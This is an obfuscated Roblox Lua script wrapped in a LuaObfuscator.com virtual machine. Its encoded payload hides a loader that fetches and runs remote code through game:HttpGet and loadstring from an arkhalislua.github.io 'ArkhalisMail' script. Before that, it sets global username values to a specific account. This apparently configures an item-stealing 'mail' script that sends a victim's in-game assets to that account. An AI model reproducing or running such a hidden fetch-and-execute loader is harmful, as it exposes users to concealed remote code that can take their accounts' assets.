--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v80,v19);v19=nil;v89=1;end end else return v80;end end end);local function v20(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/((3 -1)^(v32-((1639 -(1523 + 114)) -1))))%(2^(((v33-1) -(v32-(620 -(499 + 56 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;end end else local v83=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v83 + v83))>=v83) and (1 + (0 -0))) or (877 -(282 + 595)) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=958 -((2127 -1235) + 65) ;end end end local function v22()local v36=0;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==(350 -(87 + 263))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 84 + 29)) );v18=v18 + 2 + 0 ;v36=2 -1 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * ((1184 -(915 + 82)) + 69)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,2 -(1487 -(998 + 488)) ,12 + 8 ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,21,70 -(32 + 7) );local v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 -(772 -(201 + 571)))) then return v48 * ((1156 -(116 + 1022)) -(10 + 8)) ;else v47=1;v45=0 -0 ;end elseif (v47==((10362 -7873) -(416 + 26))) then return ((v46==0) and (v48 * ((3 -2)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/((440 -(47 + 98 + 293))^(482 -(44 + 386))))) ;end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==(2 + 1)) then return v6(v52);end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=861 -(814 + (1125 -(1020 + 60))) ;end if (((1423 -(630 + 793)) -0)==v50) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1 + 0 ;end if ((1 + 1)==v50) then v52={};for v91=886 -(261 + 624) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=4 -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v53~=(0 -0)) then else local v86=0 -0 ;while true do if (v86~=(1520 -(1191 + 327))) then else v53=1 + 0 ;break;end if (v86~=(699 -(208 + 490))) then else v56={};v57={v54,v55,nil,v56};v86=2;end if ((0 + 0)==v86) then v54={};v55={};v86=1;end end end if (v53~=2) then else local v87=0;while true do if (v87~=0) then else for v100=1,v23() do local v101=202 -(14 + 188) ;local v102;local v103;while true do if (v101==(676 -(534 + 141))) then while true do if (v102==0) then v103=v21();if (v20(v103,1 + 0 ,1)==(0 + 0)) then local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==0) then v170=0 + 0 ;v171=nil;v169=1;end if (v169==1) then v172=nil;v173=nil;v169=2;end if (v169~=(3 -1)) then else v174=nil;while true do if (1==v170) then v173=nil;v174=nil;v170=2;end if (v170==0) then local v184=0;while true do if (v184~=(1 -0)) then else v170=2 -1 ;break;end if (0~=v184) then else v171=0;v172=nil;v184=1 + 0 ;end end end if ((2 + 0)==v170) then while true do if (3==v171) then if (v20(v173,3,3)~=(397 -(115 + 281))) then else v174[9 -5 ]=v59[v174[4 + 0 ]];end v54[v100]=v174;break;end if (v171~=(2 -1)) then else local v186=0;local v187;while true do if (v186~=0) then else v187=0 -0 ;while true do if (v187~=0) then else local v195=0;while true do if (v195==1) then v187=1;break;end if (v195==(867 -(550 + 317))) then v174={v22(),v22(),nil,nil};if (v172==(0 -0)) then local v196=0 -0 ;local v197;local v198;while true do if (v196==(285 -(134 + 151))) then v197=0;v198=nil;v196=1666 -(970 + 695) ;end if (v196~=1) then else while true do if (v197~=0) then else v198=0 -0 ;while true do if (0~=v198) then else v174[3]=v22();v174[1994 -(582 + 1408) ]=v22();break;end end break;end end break;end end elseif (v172==1) then v174[10 -7 ]=v23();elseif (v172==2) then v174[3 -0 ]=v23() -(2^16) ;elseif (v172==3) then local v201=0 -0 ;local v202;while true do if ((1824 -(1195 + 629))~=v201) then else v202=0 -0 ;while true do if (v202~=(241 -(187 + 54))) then else v174[3]=v23() -((782 -(162 + 618))^(12 + 4)) ;v174[4]=v22();break;end end break;end end end v195=1;end end end if (v187==(1 + 0)) then v171=2;break;end end break;end end end if (v171~=2) then else local v188=0;while true do if (v188==(0 -0)) then if (v20(v173,1 -0 ,1)~=1) then else v174[1 + 1 ]=v59[v174[2]];end if (v20(v173,1638 -(1373 + 263) ,1002 -(451 + 549) )~=(1 + 0)) then else v174[4 -1 ]=v59[v174[3]];end v188=1 -0 ;end if (1==v188) then v171=3;break;end end end if (v171==(1384 -(746 + 638))) then v172=v20(v103,1 + 1 ,3);v173=v20(v103,4,6);v171=1;end end break;end end break;end end end break;end end break;end if (v101==(0 -0)) then local v110=0;while true do if (v110==1) then v101=1;break;end if ((341 -(218 + 123))==v110) then v102=0;v103=nil;v110=1582 -(1535 + 46) ;end end end end end for v104=1,v23() do v55[v104-1 ]=v28();end v87=1 + 0 ;end if (v87==(1 + 0)) then return v57;end end end if (1==v53) then local v88=560 -(306 + 254) ;while true do if (v88==(0 + 0)) then v58=v23();v59={};v88=1 -0 ;end if (v88==(1468 -(899 + 568))) then for v106=1,v58 do local v107=0;local v108;local v109;while true do if (1==v107) then if (v108==(1 + 0)) then v109=v21()~=0 ;elseif (v108==(4 -2)) then v109=v24();elseif (v108~=(606 -(268 + 335))) then else v109=v25();end v59[v106]=v109;break;end if (v107==0) then local v112=0;while true do if ((290 -(60 + 230))~=v112) then else v108=v21();v109=nil;v112=573 -(426 + 146) ;end if (v112==1) then v107=1 + 0 ;break;end end end end end v57[1459 -(282 + 1174) ]=v21();v88=813 -(569 + 242) ;end if (v88==2) then v53=5 -3 ;break;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v85=0;while true do if (1==v85) then if (v79<=5) then if (v79<=2) then if (v79<=0) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==1) then v76[v78[2]]();else local v120=v78[2];local v121,v122=v69(v76[v120](v13(v76,v120 + 1 ,v78[3])));v71=(v122 + v120) -1 ;local v123=0;for v137=v120,v71 do v123=v123 + 1 ;v76[v137]=v121[v123];end end elseif (v79<=3) then do return;end elseif (v79>4) then local v124=v78[2];v76[v124]=v76[v124](v13(v76,v124 + 1 ,v71));else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=8) then if (v79<=6) then local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (v113==5) then v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3]~=0 ;v70=v70 + 1 ;v113=6;end if (v113==8) then v118=v78[2];v76[v118]=v76[v118](v13(v76,v118 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v113=9;end if (v113==3) then v78=v66[v70];v118=v78[2];v117=v76[v78[3]];v76[v118 + 1 ]=v117;v113=4;end if (v113==7) then v114=0;for v175=v118,v71 do local v176=0;while true do if (v176==0) then v114=v114 + 1 ;v76[v175]=v115[v114];break;end end end v70=v70 + 1 ;v78=v66[v70];v113=8;end if (v113==6) then v78=v66[v70];v118=v78[2];v115,v116=v69(v76[v118](v13(v76,v118 + 1 ,v78[3])));v71=(v116 + v118) -1 ;v113=7;end if (v113==9) then v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[3];break;end if (v113==4) then v76[v118]=v117[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v113=5;end if (v113==2) then v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v70=v70 + 1 ;v113=3;end if (v113==0) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v113=1;end if (v113==1) then v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v113=2;end end elseif (v79>7) then local v128=0;local v129;local v130;while true do if (v128==1) then v76[v129 + 1 ]=v130;v76[v129]=v130[v78[4]];break;end if (v128==0) then v129=v78[2];v130=v76[v78[3]];v128=1;end end else for v167=v78[2],v78[3] do v76[v167]=nil;end end elseif (v79<=10) then if (v79==9) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]]=v62[v78[3]];end elseif (v79==11) then v70=v78[3];else v76[v78[2]]=v78[3];end v70=v70 + 1 ;break;end if (v85==0) then v78=v66[v70];v79=v78[1];v85=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B034O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032E3O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C2E6C756103093O00557365726E616D6531030D3O004A616B6F62353435343635373603093O00557365726E616D653200253O00120C3O00014O0007000100013O00264O00020001000100040B3O0002000100120C000100013O00262O000100120001000200040B3O0012000100120A000200033O00300600020004000500122O000200063O00122O000300073O00202O00030003000800122O000500096O000600016O000300066O00023O00024O00020001000100044O0024000100262O000100050001000100040B3O0005000100120C000200013O00262O0002001C0001000100040B3O001C000100120A000300033O0030040003000A000B00120A000300033O0030040003000C000B00120C000200023O00262O000200150001000200040B3O0015000100120C000100023O00040B3O0005000100040B3O0015000100040B3O0005000100040B3O0024000100040B3O000200012O00033O00017O00",v9(),...);end
